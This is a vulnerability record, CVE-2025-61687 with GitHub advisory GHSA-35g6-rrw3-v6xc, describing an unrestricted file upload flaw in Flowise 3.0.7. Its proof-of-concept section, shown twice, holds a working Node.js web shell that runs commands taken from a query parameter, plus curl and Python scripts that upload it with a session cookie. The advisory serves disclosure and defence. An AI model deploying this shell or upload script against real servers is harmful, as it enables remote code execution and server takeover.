CVE-2025-61687 (GCVE-0-2025-61687)
Vulnerability from cvelistv5 – Published: 2025-10-06 15:54 – Updated: 2025-10-06 16:04
VLAI?
Summary
Flowise is a drag & drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available.
Severity ?
8.3 (High)
CWE
- CWE-434 - Unrestricted Upload of File with Dangerous Type
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-61687",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-06T16:04:16.923913Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T16:04:25.632Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Flowise",
"vendor": "FlowiseAI",
"versions": [
{
"status": "affected",
"version": "= 3.0.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T15:54:56.166Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126"
},
{
"name": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954"
}
],
"source": {
"advisory": "GHSA-35g6-rrw3-v6xc",
"discovery": "UNKNOWN"
},
"title": "FlowiseAI/Flosise has File Upload vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-61687",
"datePublished": "2025-10-06T15:54:56.166Z",
"dateReserved": "2025-09-29T20:25:16.182Z",
"dateUpdated": "2025-10-06T16:04:25.632Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-61687\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-06T16:15:35.223\",\"lastModified\":\"2025-10-16T18:12:37.330\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H\",\"baseScore\":8.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:flowiseai:flowise:3.0.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E101AC09-6DF5-4FA1-853F-6CD805A8122F\"}]}]}],\"references\":[{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-61687\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-06T16:04:16.923913Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-06T16:04:21.212Z\"}}], \"cna\": {\"title\": \"FlowiseAI/Flosise has File Upload vulnerability\", \"source\": {\"advisory\": \"GHSA-35g6-rrw3-v6xc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"FlowiseAI\", \"product\": \"Flowise\", \"versions\": [{\"status\": \"affected\", \"version\": \"= 3.0.7\"}]}], \"references\": [{\"url\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc\", \"name\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954\", \"name\": \"https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-434\", \"description\": \"CWE-434: Unrestricted Upload of File with Dangerous Type\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-06T15:54:56.166Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-61687\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-06T16:04:25.632Z\", \"dateReserved\": \"2025-09-29T20:25:16.182Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-06T15:54:56.166Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-35G6-RRW3-V6XC
Vulnerability from github – Published: 2025-10-08 19:34 – Updated: 2025-10-13 15:28
VLAI?
Summary
FlowiseAI/Flosise has File Upload vulnerability
Details
Summary
A file upload vulnerability in FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).
Details
The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered.
The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities.
Taint Flow
-
Taint 01: Route Registration
POSTfile requests are routed to the controller via Multer
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8 -
Taint 02: Multer Settings
Uploaded files are stored temporarily before further handling
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954 -
Taint 03: Controller
Receives the file from Multer and delegates to the service
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11 -
Taint 04: Service Layer
Processes the file and sends results back to controller
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16 -
Taint 05: createFileAttachment
Extracts metadata, moves file to permanent storage
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126 -
Taint 06: File Save Path
Creates storage directory and saves file
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541 -
Taint 07: File Filtering
Filters dangerous characters in file names but does not reject malicious content
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111
PoC
shell.js (Node.js Web Shell)
const { exec } = require('child_process');
const http = require('http');
const server = http.createServer((req, res) => {
const url = new URL(req.url, 'http://localhost');
const cmd = url.searchParams.get('cmd');
if (cmd) {
console.log(`Executing: ${cmd}`);
exec(cmd, (error, stdout, stderr) => {
res.writeHead(200, {'Content-Type': 'text/plain'});
if (error) {
res.end(`Error: ${error.message}\n${stderr || ''}`);
} else {
res.end(stdout || 'Command executed successfully');
}
});
} else {
res.writeHead(200, {'Content-Type': 'text/html'});
res.end(`
<h1>Node.js Web Shell</h1>
<p>Use ?cmd=command to execute</p>
<p>Example: ?cmd=id</p>
`);
}
});
const PORT = 8888;
server.listen(PORT, '0.0.0.0', () => {
console.log(`Shell running on port ${PORT}`);
console.log(`Access: http://localhost:${PORT}?cmd=id`);
});
curl Upload
curl -X POST "http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/$(uuidgen)" \
-H "Cookie: jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0" \
-F "files=@shell.js;type=application/javascript"
Python Upload Script
import requests
import uuid
TARGET_URL = "http://localhost:3000"
CHATFLOW_ID = "0237eefc-18c5-46b2-8b3c-97aa516133fc"
TOKEN = "ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0"
CHAT_ID = str(uuid.uuid4())
def upload_shell():
url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}"
headers = {'Cookie': f'jwt={TOKEN}'}
files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
r = requests.post(url, headers=headers, files=files)
if r.status_code == 200:
print("[✓] Upload success")
print(r.text)
else:
print(f"[✗] Upload failed ({r.status_code})")
print(r.text)
if __name__ == "__main__":
upload_shell()
Impact
An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.
Severity ?
8.3 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "flowise"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.7"
},
{
"fixed": "3.0.8"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.0.7"
]
}
],
"aliases": [
"CVE-2025-61687"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-08T19:34:21Z",
"nvd_published_at": "2025-10-06T16:15:35Z",
"severity": "HIGH"
},
"details": "### Summary\nA file upload vulnerability in FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).\n\n### Details\nThe system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered.\n\nThe uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities.\n\n#### Taint Flow\n\n- **Taint 01: Route Registration** \n `POST` file requests are routed to the controller via Multer \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8\n\n- **Taint 02: Multer Settings** \n Uploaded files are stored temporarily before further handling \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954\n\n- **Taint 03: Controller** \n Receives the file from Multer and delegates to the service \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11\n\n- **Taint 04: Service Layer** \n Processes the file and sends results back to controller \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16\n\n- **Taint 05: createFileAttachment** \n Extracts metadata, moves file to permanent storage \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126\n\n- **Taint 06: File Save Path** \n Creates storage directory and saves file \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175 \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541\n\n- **Taint 07: File Filtering** \n Filters dangerous characters in file names but does not reject malicious content \n https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111\n\n### PoC\n\n#### shell.js (Node.js Web Shell)\n```js\nconst { exec } = require(\u0027child_process\u0027);\nconst http = require(\u0027http\u0027);\n\nconst server = http.createServer((req, res) =\u003e {\n const url = new URL(req.url, \u0027http://localhost\u0027);\n const cmd = url.searchParams.get(\u0027cmd\u0027);\n\n if (cmd) {\n console.log(`Executing: ${cmd}`);\n exec(cmd, (error, stdout, stderr) =\u003e {\n res.writeHead(200, {\u0027Content-Type\u0027: \u0027text/plain\u0027});\n if (error) {\n res.end(`Error: ${error.message}\\n${stderr || \u0027\u0027}`);\n } else {\n res.end(stdout || \u0027Command executed successfully\u0027);\n }\n });\n } else {\n res.writeHead(200, {\u0027Content-Type\u0027: \u0027text/html\u0027});\n res.end(`\n \u003ch1\u003eNode.js Web Shell\u003c/h1\u003e\n \u003cp\u003eUse ?cmd=command to execute\u003c/p\u003e\n \u003cp\u003eExample: ?cmd=id\u003c/p\u003e\n `);\n }\n});\n\nconst PORT = 8888;\nserver.listen(PORT, \u00270.0.0.0\u0027, () =\u003e {\n console.log(`Shell running on port ${PORT}`);\n console.log(`Access: http://localhost:${PORT}?cmd=id`);\n});\n```\n\n#### curl Upload\n```bash\ncurl -X POST \"http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/$(uuidgen)\" \\\n -H \"Cookie: jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0\" \\\n -F \"files=@shell.js;type=application/javascript\"\n```\n\n#### Python Upload Script\n```python\nimport requests\nimport uuid\n\nTARGET_URL = \"http://localhost:3000\"\nCHATFLOW_ID = \"0237eefc-18c5-46b2-8b3c-97aa516133fc\"\nTOKEN = \"ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0\"\nCHAT_ID = str(uuid.uuid4())\n\ndef upload_shell():\n url = f\"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}\"\n headers = {\u0027Cookie\u0027: f\u0027jwt={TOKEN}\u0027}\n files = {\u0027files\u0027: (\u0027shell.js\u0027, open(\u0027shell.js\u0027, \u0027rb\u0027), \u0027application/javascript\u0027)}\n r = requests.post(url, headers=headers, files=files)\n\n if r.status_code == 200:\n print(\"[\u2713] Upload success\")\n print(r.text)\n else:\n print(f\"[\u2717] Upload failed ({r.status_code})\")\n print(r.text)\n\nif __name__ == \"__main__\":\n upload_shell()\n```\n\n\u003cimg width=\"1900\" height=\"981\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e0d6a11e-445e-447c-a8f3-c0cb0b9ffb3f\" /\u003e\n\n\n### Impact\nAn attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.",
"id": "GHSA-35g6-rrw3-v6xc",
"modified": "2025-10-13T15:28:53Z",
"published": "2025-10-08T19:34:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61687"
},
{
"type": "PACKAGE",
"url": "https://github.com/FlowiseAI/Flowise"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126"
},
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954"
}
],
